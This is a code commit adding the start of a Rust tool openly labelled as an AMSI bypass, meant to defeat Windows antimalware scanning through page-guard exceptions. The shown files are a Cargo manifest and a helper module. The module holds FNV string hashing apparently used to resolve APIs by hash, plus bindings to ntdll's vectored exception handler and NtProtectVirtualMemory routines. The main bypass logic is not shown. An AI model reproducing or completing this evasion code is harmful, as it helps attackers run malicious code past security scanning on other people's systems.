AMSI Update

Author: Whitecat18

AMSI BYPASS/Amsi_Page_Guard_Exceptions/Cargo.toml

@@ -0,0 +1,37 @@
+[package]
+name = "Amsi_Page_Guard_Exceptions"
+version = "0.1.0"
+edition = "2024"
+
+[dependencies]
+dinvk = "0.4.2"
+windows-targets = "0.53"
+
+[dependencies.windows-sys]
+version = "0.61.2"
+features = [
+    "Win32_Foundation",
+    "Win32_Security",
+    "Win32_Globalization",
+    "Win32_System_Threading",
+    "Win32_UI_WindowsAndMessaging",
+    "Win32_System_Memory",
+    "Win32_System_Registry",
+    "Win32_System_Diagnostics_Debug",
+    "Win32_System_SystemServices",
+    "Win32_System_Environment",
+    "Win32_UI_Shell",
+    "Win32_System_LibraryLoader",
+    "Win32_System_SystemInformation",
+    "Win32_System_WindowsProgramming",
+    "Win32_System_Diagnostics_ToolHelp",
+    "Win32_UI_Input_KeyboardAndMouse",
+    "Win32_Storage_FileSystem",
+    "Win32_System_ProcessStatus",
+    "Win32_System_Kernel",
+    "Win32_System_IO",
+    "Win32_System_Diagnostics_ProcessSnapshotting",
+
+    "Wdk_Foundation",
+    "Wdk_System_SystemInformation",
+]

AMSI BYPASS/Amsi_Page_Guard_Exceptions/src/func.rs

@@ -0,0 +1,133 @@
+#![allow(non_camel_case_types)]
+#![allow(non_snake_case)]
+#![allow(dead_code)]
+
+use std::ffi::c_void;
+use std::fmt;
+use std::ptr::null_mut;
+use windows_sys::{
+    Wdk::Foundation::OBJECT_ATTRIBUTES,
+    Win32::Foundation::HANDLE,
+    Win32::Foundation::{NTSTATUS, UNICODE_STRING},
+    Win32::System::Diagnostics::Debug::EXCEPTION_POINTERS,
+    Win32::System::Memory::PAGE_PROTECTION_FLAGS,
+};
+
+use windows_targets::link;
+
+// --- LARGE_INTEGER ---
+
+#[repr(C)]
+#[derive(Clone, Copy, Debug, Default)]
+pub struct LARGE_INTEGER_s {
+    pub LowPart: u32,
+    pub HighPart: i32,
+}
+
+#[repr(C)]
+#[derive(Clone, Copy, Debug, Default)]
+pub struct LARGE_INTEGER_u {
+    pub LowPart: u32,
+    pub HighPart: i32,
+}
+
+#[repr(C)]
+#[derive(Clone, Copy)]
+pub union LARGE_INTEGER {
+    pub _anonymous: i64,
+    pub s: LARGE_INTEGER_s,
+    pub u: LARGE_INTEGER_u,
+    pub QuadPart: i64,
+}
+
+impl fmt::Debug for LARGE_INTEGER {
+    fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
+        unsafe { write!(f, "{}", self.QuadPart) }
+    }
+}
+
+pub type PLARGE_INTEGER = *mut LARGE_INTEGER;
+
+// --- ULARGE_INTEGER ---
+
+#[repr(C)]
+#[derive(Clone, Copy, Debug, Default)]
+pub struct ULARGE_INTEGER_s {
+    pub LowPart: u32,
+    pub HighPart: u32,
+}
+
+#[repr(C)]
+#[derive(Clone, Copy)]
+pub union ULARGE_INTEGER {
+    pub _anonymous: u64,
+    pub s: ULARGE_INTEGER_s,
+    pub u: ULARGE_INTEGER_s,
+    pub QuadPart: u64,
+}
+
+impl fmt::Debug for ULARGE_INTEGER {
+    fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
+        unsafe { write!(f, "{}", self.QuadPart) }
+    }
+}
+
+pub type PULARGE_INTEGER = *mut ULARGE_INTEGER;
+
+pub type POBJECT_ATTRIBUTES = *mut OBJECT_ATTRIBUTES;
+pub type PUNICODE_STRING = *mut UNICODE_STRING;
+
+#[inline]
+pub fn InitializeObjectAttributes(
+    p: POBJECT_ATTRIBUTES,
+    n: PUNICODE_STRING,
+    a: u32,
+    r: *mut core::ffi::c_void,
+    s: *mut core::ffi::c_void,
+) {
+    use core::mem::size_of;
+    unsafe {
+        (*p).Length = size_of::<OBJECT_ATTRIBUTES>() as u32;
+        (*p).RootDirectory = r;
+        (*p).Attributes = a;
+        (*p).ObjectName = n;
+        (*p).SecurityDescriptor = s as _;
+        (*p).SecurityQualityOfService = null_mut();
+    }
+}
+
+pub const fn nt_success(nt_status: NTSTATUS) -> bool {
+    nt_status >= 0
+}
+
+pub type AMSI_RESULT = u32;
+
+pub const fn c_hash(s: &str) -> u32 {
+    let mut hash = 0x811c9dc5u32;
+    let bytes = s.as_bytes();
+    let mut i = 0;
+    while i < bytes.len() {
+        hash ^= bytes[i] as u32;
+        hash = hash.wrapping_mul(0x01000193);
+        i += 1;
+    }
+    hash
+}
+
+pub const fn w_hash(s: &[u16]) -> u32 {
+    let mut hash = 0x811c9dc5u32;
+    let mut i = 0;
+    while i < s.len() {
+        hash ^= s[i] as u32;
+        hash = hash.wrapping_mul(0x01000193);
+        i += 1;
+    }
+    hash
+}
+
+type PVECTORED_EXCEPTION_HANDLER = extern "system" fn(*mut EXCEPTION_POINTERS) -> i32;
+
+link!("ntdll.dll" "system" fn RtlAddVectoredExceptionHandler(First: u32, Handler: PVECTORED_EXCEPTION_HANDLER) -> *mut c_void);
+link!("ntdll.dll" "system" fn RtlRemoveVectoredExceptionHandler(Handle: *mut c_void) -> u32);
+link!("ntdll.dll" "system" fn NtProtectVirtualMemory(ProcessHandle: HANDLE, BaseAddress: *mut *mut c_void, NumberOfBytesToProtect: *mut usize, NewAccessProtection: PAGE_PROTECTION_FLAGS, OldAccessProtection: *mut PAGE_PROTECTION_FLAGS) -> NTSTATUS);
+link!("ntdll.dll" "system" fn NtDelayExecution(Alertable: i32, DelayInterval: PLARGE_INTEGER) -> NTSTATUS);